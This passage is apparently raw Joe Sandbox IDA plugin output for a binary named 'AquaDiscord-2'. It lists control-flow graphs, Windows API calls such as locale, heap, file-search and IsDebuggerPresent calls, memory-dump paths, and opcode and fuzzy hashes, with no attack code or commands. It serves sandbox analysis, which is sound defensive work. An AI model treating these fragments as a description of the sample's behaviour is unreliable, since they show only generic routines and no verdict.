                                                                                          • Instruction Fuzzy Hash: 491190319487814AC7304A3E8C88A22EEE4EB52370B280799D9B6A75F1CE20E847D641

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32 ref: 00AF2038
                                                                                          • GetModuleFileNameW.KERNEL32 ref: 00AF2058
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: Module$FileHandleName
                                                                                          • String ID:
                                                                                          • API String ID: 4146042529-0
                                                                                          • Opcode ID: e12c7ecbf089ecee01661bc8f6c3980198e4f9872c9dd3bb5043d4fb790b9563
                                                                                          • Instruction ID: f91afcb2ace2b80d73c37c0b820378638a40cb63557becf8c7408fde01721217
                                                                                          • Opcode Fuzzy Hash: e12c7ecbf089ecee01661bc8f6c3980198e4f9872c9dd3bb5043d4fb790b9563
                                                                                          • Instruction Fuzzy Hash: 5301ECB09042088FDB14EF68D54969DBBF8BF48300F4045ADE899D7351EB749A88CF52

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 306 b064b3-b064c2 call b06822 309 b064c4-b064e9 LCMapStringEx 306->309 310 b064eb-b06505 call b0654f LCMapStringW 306->310 314 b0650b-b0650d 309->314 310->314
                                                                                          APIs
                                                                                          • LCMapStringEx.KERNELBASE(?,00B06EDA,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00B064E7
                                                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00B06EDA,?,?,-00000008,?,00000000), ref: 00B06505
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: String
                                                                                          • String ID:
                                                                                          • API String ID: 2568140703-0
                                                                                          • Opcode ID: 55f9b954da454ba452d0cb8470b1f3529c821fd3bf088640d1033bc58bedf2fc
                                                                                          • Instruction ID: a81adb79fe8d0bb5bd9fa69699050927c91987e94a57cc04dbfed362c30775c9
                                                                                          • Opcode Fuzzy Hash: 55f9b954da454ba452d0cb8470b1f3529c821fd3bf088640d1033bc58bedf2fc
                                                                                          • Instruction Fuzzy Hash: 43F0683240011ABBCF125F90DC159DE3F66EB587A0F058550FA1826160CB32D931AB90

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 315 b05677-b05680 316 b05682-b05695 RtlFreeHeap 315->316 317 b056af-b056b0 315->317 316->317 318 b05697-b056ae GetLastError call b0131d call b012d4 316->318 318->317
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,00B09A24,?,00000000,?,?,00B096C4,?,00000007,?,?,00B0A00A,?,?), ref: 00B0568D
                                                                                          • GetLastError.KERNEL32(?,?,00B09A24,?,00000000,?,?,00B096C4,?,00000007,?,?,00B0A00A,?,?), ref: 00B05698
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 485612231-0
                                                                                          • Opcode ID: 3ed97bcd538e2f0e364be1fd23ee7224b526de84b08874ccfe946a60698ecc22
                                                                                          • Instruction ID: 47b33072248bceaf7549bee5e4332dded865b3c8aa5df2515836776a62e8c474
                                                                                          • Opcode Fuzzy Hash: 3ed97bcd538e2f0e364be1fd23ee7224b526de84b08874ccfe946a60698ecc22
                                                                                          • Instruction Fuzzy Hash: 5FE08C32100658ABCB212BA8EC08BDA7ED8EB40351F5084A0FA18C74A0CB318850CF99

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 323 af14c0-af152f call b032f0 call af3030 328 af1535-af1555 call af3030 323->328 329 af1560-af156a 323->329 337 af156f-af1592 call af3030 328->337 338 af155b 328->338 330 af1597-af15be call af3050 call af3160 329->330 342 af15c4-af15cd 330->342 343 af15d2-af162c call af3330 call af3180 call af3360 call af33d0 330->343 337->330 338->329 344 af18b5-af1903 call af35b0 call af3600 342->344 359 af1632 343->359 360 af16e1 343->360 361 af1637-af1643 359->361 362 af16e6-af16ef 360->362 363 af16dc 361->363 364 af1649-af16b1 call af3410 call af34e0 call af3430 call af3500 call af33f0 361->364 365 af1707-af170c 362->365 366 af16f5-af1704 362->366 363->360 408 af16bc-af16c5 364->408 409 af16b7-af16d7 364->409 368 af1717-af175c call af3410 call af3510 call af3430 365->368 369 af1712-af17c0 365->369 366->365 394 af1761-af178d call af3500 call af33f0 368->394 374 af17c6 369->374 375 af1891-af18b0 call af3560 369->375 379 af17cb-af17d7 374->379 375->344 388 af1835-af183c 375->388 384 af17dd-af1820 call af3410 call af34e0 call af3430 379->384 385 af188c 379->385 384->388 410 af1841-af1861 call af3500 call af33f0 384->410 385->375 388->344 414 af1798-af179e 394->414 415 af1793 394->415 408->363 409->361 420 af186c-af1875 410->420 421 af1867-af1887 410->421 417 af17a1-af17b7 414->417 415->417 417->362 420->385 421->379
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strlen
                                                                                          • String ID:
                                                                                          • API String ID: 4218353326-0
                                                                                          • Opcode ID: 584ecc560c99977202464e25346d497497ff0e708cf6680d2f89b310828c7bba
                                                                                          • Instruction ID: 17e5679798ec19d0b96d3245a3a4a2e376431dd593db57de447a42d04448f17b
                                                                                          • Opcode Fuzzy Hash: 584ecc560c99977202464e25346d497497ff0e708cf6680d2f89b310828c7bba
                                                                                          • Instruction Fuzzy Hash: ABD10475604B48CFCB24EFA8C295A66BBF0BF48754B108A1DF9878BB51D735E904CB41

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 423 b077f7-b07819 424 b0792b-b07951 423->424 425 b0781f-b07831 GetCPInfo 423->425 426 b07956-b0795b 424->426 425->424 427 b07837-b0783e 425->427 428 b07965-b0796b 426->428 429 b0795d-b07963 426->429 430 b07840-b0784a 427->430 432 b07977 428->432 433 b0796d-b07970 428->433 431 b07973-b07975 429->431 430->430 434 b0784c-b0785f 430->434 435 b07979-b0798b 431->435 432->435 433->431 436 b07880-b07882 434->436 435->426 439 b0798d-b0799b call af7191 435->439 437 b07861-b07868 436->437 438 b07884-b078bb call b06ca0 call b06da1 436->438 440 b07877-b07879 437->440 449 b078c0-b078ee call b06da1 438->449 443 b0786a-b0786c 440->443 444 b0787b-b0787e 440->444 443->444 447 b0786e-b07876 443->447 444->436 447->440 452 b078f0-b078fb 449->452 453 b07909-b0790c 452->453 454 b078fd-b07907 452->454 456 b0791a 453->456 457 b0790e-b07918 453->457 455 b0791c-b07927 454->455 455->452 458 b07929 455->458 456->455 457->455 458->439
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(00000083,?,00000005,00B07678,?), ref: 00B07829
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: Info
                                                                                          • String ID:
                                                                                          • API String ID: 1807457897-0
                                                                                          • Opcode ID: f33d59065358f292391febab7b680bb79df574a592d11e037a28e475195ad94e
                                                                                          • Instruction ID: aee5c42bb50e66785b33e8ccdb4f0b96f28ec6e080be864c4f9c3eec4ab6b0d0
                                                                                          • Opcode Fuzzy Hash: f33d59065358f292391febab7b680bb79df574a592d11e037a28e475195ad94e
                                                                                          • Instruction Fuzzy Hash: C85147B1D0C158AEDB118A29CD88BE9FFE9EB05304F1442E9E589C71C2D731BD85CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 40646824c63299042c7fc712254c02dbe6acfe5d2ecdf04595ed8ccc3f7863d0
                                                                                          • Instruction ID: 4f1e60417507e510b71497d3571ff5fd22d3d3057f8f955fab66a9359bff3d7c
                                                                                          • Opcode Fuzzy Hash: 40646824c63299042c7fc712254c02dbe6acfe5d2ecdf04595ed8ccc3f7863d0
                                                                                          • Instruction Fuzzy Hash: 1E415B71A0011EABCB14DFA8C4909FDB7B9FF08314B54416AF641E7650EB35E945DBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f2e28c8a6fd3731af6ed55ca4bedc947708c9a3e0ea52b9e4d1c40aa97d98845
                                                                                          • Instruction ID: c75c808d17e93b231b3f1e7e571a6a738841ae657ea23bfad78bf823c0df38e6
                                                                                          • Opcode Fuzzy Hash: f2e28c8a6fd3731af6ed55ca4bedc947708c9a3e0ea52b9e4d1c40aa97d98845
                                                                                          • Instruction Fuzzy Hash: E401F5336202249BDB269F6CEC859563BEAFB80728B244164FD108B0D4DF31EC219BD0
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,00B07635,?,?,00B07635,00000220,?,?,?), ref: 00B056E3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: b10ccab5cc23bbe25b7d809e3710b3add356fa7cc9ec01e61738b863856f0d8b
                                                                                          • Instruction ID: 96cdcc7273ebcc06f75abc11e69120ed06919380fdfc4b0ed281cb5cdcd2a24a
                                                                                          • Opcode Fuzzy Hash: b10ccab5cc23bbe25b7d809e3710b3add356fa7cc9ec01e61738b863856f0d8b
                                                                                          • Instruction Fuzzy Hash: A4E0E531505A2457D73026A9DC00B9B7EC8DF017A1F9044E0EC16968D0DB22CC408AA4
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleFree
                                                                                          • String ID:
                                                                                          • API String ID: 771614528-0
                                                                                          • Opcode ID: 8653ee5581287c0f782aaef9a64c901eaec83bb19e81b444d871ff888e1cacf4
                                                                                          • Instruction ID: 104895837b4b76034035bbab633142cdc1914ec0ce86854624b3254b48e7d7e0
                                                                                          • Opcode Fuzzy Hash: 8653ee5581287c0f782aaef9a64c901eaec83bb19e81b444d871ff888e1cacf4
                                                                                          • Instruction Fuzzy Hash: 90C0127010010CABD740DF94D90578977E8DB04220F008021FD0CC7300DE75EA408652
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: __floor_pentium4
                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                          • API String ID: 4168288129-2761157908
                                                                                          • Opcode ID: 044e49e04583b7cb4ab99803276ff61b9e6330c01373ec211fbacb0fb6244022
                                                                                          • Instruction ID: 5ff714a45311a3d26d5b5ad4fe6f8c09c1f0b904411b5400baa03c3bb213aa7b
                                                                                          • Opcode Fuzzy Hash: 044e49e04583b7cb4ab99803276ff61b9e6330c01373ec211fbacb0fb6244022
                                                                                          • Instruction Fuzzy Hash: 2FD23672E182298BDB64DE28DD807EAB7F5EB44304F5445EAD50DE7240EB78AEC18F41
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00B0AB2D,00000002,00000000,?,?,?,00B0AB2D,?,00000000), ref: 00B0B210
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00B0AB2D,00000002,00000000,?,?,?,00B0AB2D,?,00000000), ref: 00B0B239
                                                                                          • GetACP.KERNEL32(?,?,00B0AB2D,?,00000000), ref: 00B0B24E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: 22eda6c6ee036254d10580be806a32861953492d35312a3302aed881e8925f5c
                                                                                          • Instruction ID: 9be4740bbe89838a8ade5cc2507af315e2fa7421e09d81fe59ed583db882ed99
                                                                                          • Opcode Fuzzy Hash: 22eda6c6ee036254d10580be806a32861953492d35312a3302aed881e8925f5c
                                                                                          • Instruction Fuzzy Hash: 7221C532B10101A6DB348F65C941FABBFE7EF94B50B5684E4E91AE7294E732DE40C390
                                                                                          APIs
                                                                                            • Part of subcall function 00B0590A: GetLastError.KERNEL32(00000000,?,00B07C8D), ref: 00B0590E
                                                                                            • Part of subcall function 00B0590A: SetLastError.KERNEL32(00000000,?,?,00000028,00B01F53), ref: 00B059B0
                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00B0AAFF
                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00B0AB3D
                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00B0AB50
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00B0AB98
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00B0ABB3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                          • String ID:
                                                                                          • API String ID: 415426439-0
                                                                                          • Opcode ID: 6e2935333555cd2a159e3d4bb38e4f638542d650fb76c167dda44b2cd3f73cc3
                                                                                          • Instruction ID: 83143d2b432a810b31b49e5e5705af76173b9d04d444f45ddadaa7b568b08b52
                                                                                          • Opcode Fuzzy Hash: 6e2935333555cd2a159e3d4bb38e4f638542d650fb76c167dda44b2cd3f73cc3
                                                                                          • Instruction Fuzzy Hash: E3514F71A00719ABDB20DFA4CC85AAE7BF9FF04700F5449A5E911EB1D0EB70DA40CB62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction ID: 6087d36c37d27f03c201a8a8b1e2bab508dc7e2ce5e9f1ff9b03f7f92d281836
                                                                                          • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction Fuzzy Hash: A5023DB1E002199BDF14CFA9C9846AEFBF5FF48714F2482A9E515E7381D731AE418B90
                                                                                          APIs
                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B0B849
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFindFirst
                                                                                          • String ID:
                                                                                          • API String ID: 1974802433-0
                                                                                          • Opcode ID: eb7f65ab55e2d5a607f2f941dd204b933451fbef4856a6df086be623ced899e7
                                                                                          • Instruction ID: 283ad9931626a9cca6b1617f51cdd2c6daefdc2d53c89f0b39427b441a4b9d4c
                                                                                          • Opcode Fuzzy Hash: eb7f65ab55e2d5a607f2f941dd204b933451fbef4856a6df086be623ced899e7
                                                                                          • Instruction Fuzzy Hash: F471C27190516C6FDF21AF28CC89EAABFF9EF45300F5481D9E009A3291EB318E858F14
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00AF9A3F
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00AF9B0B
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AF9B24
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00AF9B2E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
